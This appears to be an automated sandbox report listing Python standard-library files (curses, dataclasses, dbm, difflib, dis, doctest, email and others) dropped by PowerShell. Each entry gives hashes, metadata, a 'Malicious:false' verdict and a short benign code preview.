                                                                                                    MD5:E728472FF9709B5296D5B6829CB40E69
                                                                                                    SHA1:8950CA0142AF7EA7D04FF912F865F83F758ACDC9
                                                                                                    SHA-256:A1425DA6F4324E7ECFC08E6EFD11792621BA7AF5E075AD3AC056048146EC950A
                                                                                                    SHA-512:740695CAF097A46C9626890E9FBEC4D6C10B028D1AC68931DD0E80949E9C4C29B1EA77CC4F693AC95E02276AC5A086225D23CC298C3FC2C5E6F8139E21268D7C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import os..import shutil..import subprocess..import sys....# find_library(name) returns the pathname of a library, or None...if os.name == "nt":.... def _get_build_version():.. """Return the version of MSVC that was used to build Python..... For Python 2.3 and up, the version number is included in.. sys.version. For earlier versions, assume the compiler is MSVC 6... """.. # This function was copied from Lib/distutils/msvccompiler.py.. prefix = "MSC v.".. i = sys.version.find(prefix).. if i == -1:.. return 6.. i = i + len(prefix).. s, rest = sys.version[i:].split(" ", 1).. majorVersion = int(s[:-2]) - 6.. if majorVersion >= 13:.. majorVersion += 1.. minorVersion = int(s[2:3]) / 10.0.. # I don't think paths are affected by minor version in version 6.. if majorVersion == 6:.. minorVersion = 0.. if majorVersion >= 6:.. return majorV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5831
                                                                                                    Entropy (8bit):5.213234544711431
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:OIg/H+tkjWHgK0WVeZMgs4EnV6V7VxiLZgV2YVvjOlXJtiJtVzq3xk5b3:+LSCsHV6V7VkLZgV2YVvoXJtiJtVG6
                                                                                                    MD5:FC9DB9D554AC39F8D49E34ACA030A2E2
                                                                                                    SHA1:AEF28B19D54F318C81CE7CC3951C8F3A02DD7209
                                                                                                    SHA-256:4D9150E8603BD922E9DBEE8A5E9CF1379CF599A382B09A5CBF09BED520F6C459
                                                                                                    SHA-512:97746A8F02773D29B4F7814DAD3F4FAE0C29FF5D090606F81D4AE52E680F8292EF53C6916B8D0E60D368B3D8286C81961A919E67B5C1F9DD304E8158D34AD0A0
                                                                                                    Malicious:false
                                                                                                    Preview:# The most useful windows datatypes..import ctypes....BYTE = ctypes.c_ubyte..WORD = ctypes.c_ushort..DWORD = ctypes.c_ulong....#UCHAR = ctypes.c_uchar..CHAR = ctypes.c_char..WCHAR = ctypes.c_wchar..UINT = ctypes.c_uint..INT = ctypes.c_int....DOUBLE = ctypes.c_double..FLOAT = ctypes.c_float....BOOLEAN = BYTE..BOOL = ctypes.c_long....class VARIANT_BOOL(ctypes._SimpleCData):.. _type_ = "v".. def __repr__(self):.. return "%s(%r)" % (self.__class__.__name__, self.value)....ULONG = ctypes.c_ulong..LONG = ctypes.c_long....USHORT = ctypes.c_ushort..SHORT = ctypes.c_short....# in the windows header files, these are structures..._LARGE_INTEGER = LARGE_INTEGER = ctypes.c_longlong.._ULARGE_INTEGER = ULARGE_INTEGER = ctypes.c_ulonglong....LPCOLESTR = LPOLESTR = OLESTR = ctypes.c_wchar_p..LPCWSTR = LPWSTR = ctypes.c_wchar_p..LPCSTR = LPSTR = ctypes.c_char_p..LPCVOID = LPVOID = ctypes.c_void_p....# WPARAM is defined as UINT_PTR (unsigned type)..# LPARAM is defined as LONG_PTR (signed typ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3470
                                                                                                    Entropy (8bit):4.6313548180715145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:X34viBZiikmTPnKpgaXObF6tGZqGCNj3OWPI/RWg7vCwi0eIKT5KLJghEfUwRTWi:X3xZJpaC6DheWIY6qtzIY0e29L
                                                                                                    MD5:63A612B59CF6205D8F5DC6984B8030C0
                                                                                                    SHA1:825D120E85A437872023475A70894A3E74D6023D
                                                                                                    SHA-256:EF71D789E173399F3F33F1EF5F5284456C9F3690779D1E597F3A92BD67C64E9C
                                                                                                    SHA-512:7A0666A8257FAA4D4E236E71EC63B9ECB6DFCB1F7A504EAA8E2030E99EF5AE525211DF9500CBA51DB5DE0DEE2CC0D7F913FC815B05FD2FE7331B78D1A65CCBD3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""curses....The main package for curses support for Python. Normally used by importing..the package, and perhaps a particular module inside it..... import curses.. from curses import textpad.. curses.initscr().. ......."""....from _curses import *..import os as _os..import sys as _sys....# Some constants, most notably the ACS_* ones, are only added to the C..# _curses module's dictionary after initscr() is called. (Some..# versions of SGI's curses don't define values for those constants..# until initscr() has been called.) This wrapper function calls the..# underlying C initscr(), and then copies the constants from the..# _curses module to the curses package's dictionary. Don't do 'from..# curses import *' if you'll be needing the ACS_* constants.....def initscr():.. import _curses, curses.. # we call setupterm() here because it raises an error.. # instead of calling exit() in error cases... setupterm(term=_os.environ.get("TERM", "unknown"),.. fd=_
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2642
                                                                                                    Entropy (8bit):4.8016671130608986
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:6qKTzixq3sIkl75d2k3Z1gxDgZhl9F0zEnu7USaAtIamVrEJG:6taDqk3PvZhPyEn2UfAtIzVreG
                                                                                                    MD5:79B27D9EBA6AEF0DB15B4DDD647CC186
                                                                                                    SHA1:B8C84580CA9AA9E911B8C3BBDF66F5B587388DDC
                                                                                                    SHA-256:DD74F344619190C939DAAF216DF8790C41C5CC859B5D35E806BA602519233180
                                                                                                    SHA-512:F199785915C77DEA5F5B06532BF85401BB665E53E3E3FC93B95C626110D79DC4433E2EAB9E64A63BF79AE146520CD603C818C6DAEF719370897C3AE14582F8F3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Constants and membership tests for ASCII characters"""....NUL = 0x00 # ^@..SOH = 0x01 # ^A..STX = 0x02 # ^B..ETX = 0x03 # ^C..EOT = 0x04 # ^D..ENQ = 0x05 # ^E..ACK = 0x06 # ^F..BEL = 0x07 # ^G..BS = 0x08 # ^H..TAB = 0x09 # ^I..HT = 0x09 # ^I..LF = 0x0a # ^J..NL = 0x0a # ^J..VT = 0x0b # ^K..FF = 0x0c # ^L..CR = 0x0d # ^M..SO = 0x0e # ^N..SI = 0x0f # ^O..DLE = 0x10 # ^P..DC1 = 0x11 # ^Q..DC2 = 0x12 # ^R..DC3 = 0x13 # ^S..DC4 = 0x14 # ^T..NAK = 0x15 # ^U..SYN = 0x16 # ^V..ETB = 0x17 # ^W..CAN = 0x18 # ^X..EM = 0x19 # ^Y..SUB = 0x1a # ^Z..ESC = 0x1b # ^[..FS = 0x1c # ^\..GS = 0x1d # ^]..RS = 0x1e # ^^..US = 0x1f # ^_..SP = 0x20 # space..DEL = 0x7f # delete....controlnames = [.."NUL", "SOH", "STX", "ETX", "EOT", "ENQ", "ACK", "BEL",.."BS", "HT", "LF", "VT", "FF", "CR", "SO", "SI",.."DLE",
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5826
                                                                                                    Entropy (8bit):4.959924122820079
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:uuz7HHzV3jkTy3YedCYWh/1aJUEkUQgy6nIhE7Xcpo0Hbo/YsyZ1i3C:uuB9AYUUQgy6n+ysz0/YsyL4C
                                                                                                    MD5:46B1621C4966F8371A3DEF67C5C6D632
                                                                                                    SHA1:7037456C1925919F1831799C924D78B7A327E7C7
                                                                                                    SHA-256:4838A7369459A90C58CFA5804C824F486BFAC1B7A8AE751C7DAB5443B500695E
                                                                                                    SHA-512:059CFD25C38EB136F68551103470A82571D4A5EBEFB7708CAB16281B84C4ED8F4CA4C8D30FC42696B51099E33BF4319DE149AA760EFE22E7B4616A0902240CEA
                                                                                                    Malicious:false
                                                                                                    Preview:..#..# Emulation of has_key() function for platforms that don't use ncurses..#....import _curses....# Table mapping curses keys to the terminfo capability name...._capability_names = {.. _curses.KEY_A1: 'ka1',.. _curses.KEY_A3: 'ka3',.. _curses.KEY_B2: 'kb2',.. _curses.KEY_BACKSPACE: 'kbs',.. _curses.KEY_BEG: 'kbeg',.. _curses.KEY_BTAB: 'kcbt',.. _curses.KEY_C1: 'kc1',.. _curses.KEY_C3: 'kc3',.. _curses.KEY_CANCEL: 'kcan',.. _curses.KEY_CATAB: 'ktbc',.. _curses.KEY_CLEAR: 'kclr',.. _curses.KEY_CLOSE: 'kclo',.. _curses.KEY_COMMAND: 'kcmd',.. _curses.KEY_COPY: 'kcpy',.. _curses.KEY_CREATE: 'kcrt',.. _curses.KEY_CTAB: 'kctab',.. _curses.KEY_DC: 'kdch1',.. _curses.KEY_DL: 'kdl1',.. _curses.KEY_DOWN: 'kcud1',.. _curses.KEY_EIC: 'krmir',.. _curses.KEY_END: 'kend',.. _curses.KEY_ENTER: 'kent',.. _curses.KEY_EOL: 'kel',.. _curses.KEY_EOS: 'ked',.. _curses.KEY_EXIT: 'kext',.. _curses.KEY_F0: 'kf0',.. _curses.KEY_F1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93
                                                                                                    Entropy (8bit):4.41480518258504
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:XHWSwojbJAUXFJQBXWov3Z6HG7ASBiv:XHWSdjbHXFqX7ii7M
                                                                                                    MD5:5D453D87DBDD7C37EB62894B472EB094
                                                                                                    SHA1:67787E6A4D122CD29B3A66D20084E8C6CF0CA126
                                                                                                    SHA-256:9B10A03C3224939D9BE2A078FE896DA5CFEAA9740D265F8052B5403BC5E15BBF
                                                                                                    SHA-512:8644680425F755CFB0B62AA5E52ABABE68AB0471A1D79EEEBD99CD9A8EDB6916B5230451BEA9F9B08ACDFE21358666123A2C2DCF3D3212AC2B12D89940DE41F9
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""curses.panel....Module for using panels with curses..."""....from _curses_panel import *..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7958
                                                                                                    Entropy (8bit):4.318619931355464
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:P6dHpCmeBad+KxGBjgCt+GgUE8ytI1NZG65K8RFGIsyiU4fIXYivRB264tQga:iYUdl20tI5GWXRhsyiU4ti54tQga
                                                                                                    MD5:BDF542435AA2442F9368EB5A4AA49C02
                                                                                                    SHA1:054C1BB893DDCDFD710F9E6D47C3D41AC8396EC0
                                                                                                    SHA-256:BCDFA4F07204B101F3DA7A0FE6BB5FF7B5BA8C4AA6DBC84EC57E8E3CFA3BC814
                                                                                                    SHA-512:725A277FB26CDF22171A4AA57D751671B73D31DE807DF535B4267AA3A66C40E4A262F36365166823F08775378C9DF9E83028B94AB455265B812ADCF79415248F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Simple textbox editing widget with Emacs-like keybindings."""....import curses..import curses.ascii....def rectangle(win, uly, ulx, lry, lrx):.. """Draw a rectangle with corners at the provided upper-left.. and lower-right coordinates... """.. win.vline(uly+1, ulx, curses.ACS_VLINE, lry - uly - 1).. win.hline(uly, ulx+1, curses.ACS_HLINE, lrx - ulx - 1).. win.hline(lry, ulx+1, curses.ACS_HLINE, lrx - ulx - 1).. win.vline(uly+1, lrx, curses.ACS_VLINE, lry - uly - 1).. win.addch(uly, ulx, curses.ACS_ULCORNER).. win.addch(uly, lrx, curses.ACS_URCORNER).. win.addch(lry, lrx, curses.ACS_LRCORNER).. win.addch(lry, ulx, curses.ACS_LLCORNER)....class Textbox:.. """Editing widget using the interior of a window object... Supports the following Emacs-like key bindings:.... Ctrl-A Go to left edge of window... Ctrl-B Cursor left, wrapping to previous line if appropriate... Ctrl-D Delete character under cursor... Ctrl-E Go to
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63334
                                                                                                    Entropy (8bit):4.554279086644667
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:nVS1yQgJzsfzC7p30ZOyMObfdldG0DNhWJu8kUC0TGNymq4jsgzBAoPv:nVSbgUP55BA6v
                                                                                                    MD5:50C0AF51B067736C07A22259274203F7
                                                                                                    SHA1:0F9EAC094DC3027D562B02CAD4020AA2FDA0D447
                                                                                                    SHA-256:ECE6C46C2B051F8C4FA7A02E084BB51A22325AE9A86CE7FC583C334B6D8D2EC3
                                                                                                    SHA-512:505D172BA3524488F9427BB5E4D08CAF5E92405796EF5CF3D9B9AD587CAEACE224D9221A2ABF113A82BCF2F6D230B9C4F948F2A710AB43285C005E392A7AAADD
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import re..import sys..import copy..import types..import inspect..import keyword..import functools..import itertools..import abc..import _thread..from types import FunctionType, GenericAlias......__all__ = ['dataclass',.. 'field',.. 'Field',.. 'FrozenInstanceError',.. 'InitVar',.. 'KW_ONLY',.. 'MISSING',.... # Helper functions... 'fields',.. 'asdict',.. 'astuple',.. 'make_dataclass',.. 'replace',.. 'is_dataclass',.. ]....# Conditions for adding methods. The boxes indicate what action the..# dataclass decorator takes. For all of these tables, when I talk..# about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm..# referring to the arguments to the @dataclass decorator. When..# checking if a dunder method already exists, I mean check for an..# entry in the class's __dict__. I never check to see if an attribute..# is defined in a base clas
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):277
                                                                                                    Entropy (8bit):4.4269070385805716
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:g9Mn8T9Mn8pdOYdRpLXGvn8Tvn8pdOjD6RERbJ9RMT9RMtLhDLAowg+rIakbQPy:YDpdldRRFIpdQD6iJz2eLhQjgsIasQPy
                                                                                                    MD5:2F62882E2CB74D2D97D848E3F39CA0EB
                                                                                                    SHA1:E3AE01A237B6AA3577F10B2BAEE88F9668CBAB16
                                                                                                    SHA-256:5068C4ED2C79BFB4B9AE426675112CA8C89CA27AA40B33DABE6CD313AB22DD73
                                                                                                    SHA-512:CDC083EF42E189E4287DD07B17638B8DBF02E1C5A53E2D529EFEF96BEFD45AF4956384A841571460EB1419CEAB0287BCE1C99C52423B1AB3B87A7373278644EF
                                                                                                    Malicious:false
                                                                                                    Preview:try:.. from _datetime import *.. from _datetime import __doc__..except ImportError:.. from _pydatetime import *.. from _pydatetime import __doc__....__all__ = ("date", "datetime", "time", "timedelta", "timezone", "tzinfo",.. "MINYEAR", "MAXYEAR", "UTC")..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6072
                                                                                                    Entropy (8bit):4.437386125288259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Y0Z6om2P6kXGyFQBEIA7FZKOYS8QYG6mV4JFZlUPhNtbPFXzl0lWtEU:jN1ikXGgQ+77FZVJlVClAr95zZtT
                                                                                                    MD5:B20818F8CCEEA3CC9488C79EF0DD809C
                                                                                                    SHA1:22AD51A255BE7EE05CBC48AC32AF6B90B54393DA
                                                                                                    SHA-256:166B25F6A81A2D970D057BAD1EA64BAF9B83B65028C3A6D09F0F184C754BDE48
                                                                                                    SHA-512:E7976B3B41684156C9B1D60974DFB79D26F26FCE120A8527E1620CC4D917045CAAE0FA7FCDCF347AA8B0DC69AB8F697083DAF22356B4450D7658E0D112BE2FB6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Generic interface to all dbm clones.....Use.... import dbm.. d = dbm.open(file, 'w', 0o666)....The returned object is a dbm.gnu, dbm.ndbm or dbm.dumb object, dependent on the..type of database being opened (determined by the whichdb function) in the case..of an existing dbm. If the dbm does not exist and the create or new flag ('c'..or 'n') was specified, the dbm type will be determined by the availability of..the modules (tested in the above order).....It has the following interface (key and data are strings):.... d[key] = data # store data at key (may override data at.. # existing key).. data = d[key] # retrieve data at key (raise KeyError if no.. # such key).. del d[key] # delete data stored at key (raises KeyError.. # if no such key).. flag = key in d # true if the key exists.. list = d.keys() # return a list of all existing keys (slow!)....Future versio
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11911
                                                                                                    Entropy (8bit):4.457013162753753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:LyENNkKganL8/o/LMwRU0hY9uD+g80U/RT18/e3n33M3qNcR4:LYarMyhce4
                                                                                                    MD5:75F093FC1BAA8147653332D0A1EF3B28
                                                                                                    SHA1:5C27C22E59A7F1AAC0E25C47DD8AD01E3A7110B7
                                                                                                    SHA-256:3E624BE74A2FB347C2B1FFE877CCC77182618E0BDF94C4CB7A343ED8CCD7584B
                                                                                                    SHA-512:468FD350848DD49B362592FEBFEE663A7F26D8A09B0B3129A0A117937756366B8EF5E14A85A619D931A89749E01406AD1C7B2D327890FC06313DE026D737AEF4
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""A dumb and slow but simple dbm clone.....For database spam, spam.dir contains the index (a text file),..spam.bak *may* contain a backup of the index (also a text file),..while spam.dat contains the data (a binary file).....XXX TO DO:....- seems to contain a bug when updating.......- reclaim free space (currently, space once occupied by deleted or expanded..items is never reused)....- support concurrent access (currently, if two processes take turns making..updates, they can mess up the index)....- support efficient access to large databases (currently, the whole index..is read when the database is opened, and some updates rewrite the whole index)....- support opening for read-only (flag = 'm')...."""....import ast as _ast..import io as _io..import os as _os..import collections.abc....__all__ = ["error", "open"]...._BLOCKSIZE = 512....error = OSError....class _Database(collections.abc.MutableMapping):.... # The on-disk directory and data files can remain in mutually.. # inconsi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75
                                                                                                    Entropy (8bit):4.301891945228928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:OAArkHIF3BcTxIxPjZ6CH4JgBiv:OlIQBdx9mgBM
                                                                                                    MD5:49B75CF4D832E5DB5BFE4537C5332188
                                                                                                    SHA1:2EB4AA2CC6539F68E5A42590919F97CF02B47F24
                                                                                                    SHA-256:98DCF3E73DC56C7DBF013852F685EAC1FE3A911785E682AB69836EBA5656C142
                                                                                                    SHA-512:AD5DF52AD3AEF6D44F23D934CD3DE15E7D1BA4900FDE2E70C21009B074C718A47ECFEFA2B14B2FE9462B7DC0BBA8C5371236CA926704A0FD21DEC0FF4D1B450B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Provide the _gdbm module as a dbm submodule."""....from _gdbm import *..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73
                                                                                                    Entropy (8bit):4.237502560318079
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:OAArb0cTxIxPjZ6xxBiv:OlUdx98xBM
                                                                                                    MD5:5967B257F3143A915F76FA1F4494E989
                                                                                                    SHA1:BD1C90535C5926383AE4B6D02936AB96A147AE92
                                                                                                    SHA-256:D747238751AA697D7040EE1479E0C3EFF0172E1195825061CF517CF9BEF30050
                                                                                                    SHA-512:B6DB12A07B47BB2D034354B81CF4EDEC4E7F1305DE222FC7E68F14AB290F12F9F576D7BB4EFF138186E1B6DED2168882A79447EA1BCFDD3ED5C19869503EEBD9
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Provide the _dbm module as a dbm submodule."""....from _dbm import *..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):331
                                                                                                    Entropy (8bit):4.098213504925523
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:DoJ2xToJ2xpdOWoJ2x7EdMoJ2xhVfwRpLXGFJ2xTFJ2xpdOWFJ2x7EdMFJ2xhVfv:E4xU4xpdg4xgdN4xhVfYRW4xR4xpdt4E
                                                                                                    MD5:19468B7C81C8C73F6B37DE1BE745672C
                                                                                                    SHA1:1877E11D665B90BCEBED2341A6806DCBC62FB499
                                                                                                    SHA-256:F205D8DC95D81B5D2B59362CBE0E385CFEEB98C14A70971F3372BE1403378B03
                                                                                                    SHA-512:3D129FA184C46A8B8D77D235946875DA7543EE964E1FEEC5986C3816EA9A4D023F3A71A3EBDA9D6539CF7F561C8E0D8F9749B9CB3310B84B16391642A5E7CD2A
                                                                                                    Malicious:false
                                                                                                    Preview:..try:.. from _decimal import *.. from _decimal import __doc__.. from _decimal import __version__.. from _decimal import __libmpdec_version__..except ImportError:.. from _pydecimal import *.. from _pydecimal import __doc__.. from _pydecimal import __version__.. from _pydecimal import __libmpdec_version__..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):85364
                                                                                                    Entropy (8bit):4.512246773776763
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:PxMUIKEi9FINTaSyEJH7/7Jh1rHww2FJQppY5VbhCAMqRCKM8g6S8/2wUcZ:vIBqqY5VbhCAM+CKM8FS8/VZ
                                                                                                    MD5:FF9CBAADC1B0F414B2627CE5F761AB8E
                                                                                                    SHA1:8ED742A47D1C009E2789328C2AD2DF72D3788B7F
                                                                                                    SHA-256:F517AE2F8750BD8A1C7A2F5BB14310CA2D961B7402AF7A8AB256EF75C91769B6
                                                                                                    SHA-512:191349E29C43C528D9246607189E6F8D740134121A46EF96E94C0A51C441EEC8D47C05DFDC53E33294EF35B35BD7153A3DDA7B5DBF1A41F9FA4F6309D3D5CCD6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..Module difflib -- helpers for computing deltas between objects.....Function get_close_matches(word, possibilities, n=3, cutoff=0.6):.. Use SequenceMatcher to return list of the best "good enough" matches.....Function context_diff(a, b):.. For two lists of strings, return a delta in context diff format.....Function ndiff(a, b):.. Return a delta: the difference between `a` and `b` (lists of strings).....Function restore(delta, which):.. Return one of the two sequences that generated an ndiff delta.....Function unified_diff(a, b):.. For two lists of strings, return a delta in unified diff format.....Class SequenceMatcher:.. A flexible class for comparing pairs of sequences of any type.....Class Differ:.. For producing human-readable deltas from sequences of lines of text.....Class HtmlDiff:.. For producing HTML side by side comparison with change highlights..."""....__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',.. 'Differ','IS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31014
                                                                                                    Entropy (8bit):4.549595297390582
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0GQ9YbheVe4TBHD24wi7iIaDtEhUffbERzwC:RQ9YFeUN4wi7i3pEhU7FC
                                                                                                    MD5:17703E44412C3EC9691F26B9FFBFF025
                                                                                                    SHA1:2F949E4285465D990335A7BF195F79A516FBD359
                                                                                                    SHA-256:77F36465F7043CC1A03CC9400D7AA9CBC20FBFD352B67F797722234AFAFB78FC
                                                                                                    SHA-512:79C445A1C1FB576B0938F6EBC0014820370F5F7D9A43ABA2D1CCEE5A5AC0896394E3D58DB510FB86F032ABC986037765A0564DCB1AA4EB7EE5F7371FCB752B2C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Disassembler of Python byte code into mnemonics."""....import sys..import types..import collections..import io....from opcode import *..from opcode import (.. __all__ as _opcodes_all,.. _cache_format,.. _inline_cache_entries,.. _nb_ops,.. _intrinsic_1_descs,.. _intrinsic_2_descs,.. _specializations,.. _specialized_instructions,..)....__all__ = ["code_info", "dis", "disassemble", "distb", "disco",.. "findlinestarts", "findlabels", "show_code",.. "get_instructions", "Instruction", "Bytecode"] + _opcodes_all..del _opcodes_all...._have_code = (types.MethodType, types.FunctionType, types.CodeType,.. classmethod, staticmethod, type)....FORMAT_VALUE = opmap['FORMAT_VALUE']..FORMAT_VALUE_CONVERTERS = (.. (None, ''),.. (str, 'str'),.. (repr, 'repr'),.. (ascii, 'ascii'),..)..MAKE_FUNCTION = opmap['MAKE_FUNCTION']..MAKE_FUNCTION_FLAGS = ('defaults', 'kwdefaults', 'annotations', 'closure')....LOAD_CONST = opmap['LOAD_CONST']..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):109317
                                                                                                    Entropy (8bit):4.55453891907484
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:kELdN9WiDzDeFhoeYsioJT0U+0GNZ9sjQeOax9VUaHwez20T+28:bdN9WiDzDeFhFYsioJT0U+0GNZ9sjQei
                                                                                                    MD5:D0941298414AE243472D1A5924367DC9
                                                                                                    SHA1:8B2FDC03ADCA9B9B114CD69E1B32E9AEECA1E892
                                                                                                    SHA-256:1364770532FBA6645D3343E23D5D277A1699EF4F88702B315A5892FD381CCDB7
                                                                                                    SHA-512:E565CA28A60E2E109829F6D052837DC09D00047229CA958525A94A2839E782C3B907C775724C02F1FB82D31121955E1A8AC53F69351CCCD703D0EF95191F90FE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Module doctest...# Released to the public domain 16-Jan-2001, by Tim Peters (tim@python.org)...# Major enhancements and refactoring by:..# Jim Fulton..# Edward Loper....# Provided as-is; use at your own risk; no warranty; no promises; enjoy!....r"""Module doctest -- a framework for running examples in docstrings.....In simplest use, end each module M to be tested with:....def _test():.. import doctest.. doctest.testmod()....if __name__ == "__main__":.. _test()....Then running the module as a script will cause the examples in the..docstrings to get executed and verified:....python M.py....This won't display anything unless an example fails, in which case the..failing example(s) and the cause(s) of the failure(s) are printed to stdout..(why not stderr? because stderr is a lame hack <0.2 wink>), and the final..line of output is "Test failed.".....Run it with the -v switch instead:....python M.py -v....and a detailed report of all examples tried is printed to stdout, alo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1825
                                                                                                    Entropy (8bit):4.655187743194238
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2XvNh6MGDF/hDSvkvxnsj/axPSLxnsbXqxP0:2Xlh6MgDxnsjuPSlnsbXGP0
                                                                                                    MD5:03BD52E5F016DB3578053FF11252F401
                                                                                                    SHA1:A412CB62418071C4718A0B2F9A73BDA37AE1B567
                                                                                                    SHA-256:F4B71B7B51A7EEBC46BBB6470CF6DA746CBB5E9548A6BC2A57B84F451EFD9769
                                                                                                    SHA-512:32E0A9484851071F59B909E544E8D1992592FA6ED9E4BA97A91FA8835345ACBD4E3580E2FACF0EAC9169899AC897AA4D6B18842C354CBC3E0D5E734BDDBEB7E3
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""A package for parsing, handling, and generating email messages."""....__all__ = [.. 'base64mime',.. 'charset',.. 'encoders',.. 'errors',.. 'feedparser',.. 'generator',.. 'header',.. 'iterators',.. 'message',.. 'message_from_file',.. 'message_from_binary_file',.. 'message_from_string',.. 'message_from_bytes',.. 'mime',.. 'parser',.. 'quoprimime',.. 'utils',.. ]......# Some convenience routines. Don't import Parser and Message as side-effects..# of importing email since those cascadingly import most of the rest of the..# email package...def message_from_string(s, *args, **kws):.. """Parse a string into a Message object model..... Optional _class and strict are passed to the Parser constructor... """.. from email.parser import Parser.. return Parser(*args, **kws).parsestr(s)....def message_from_bytes(s, *a
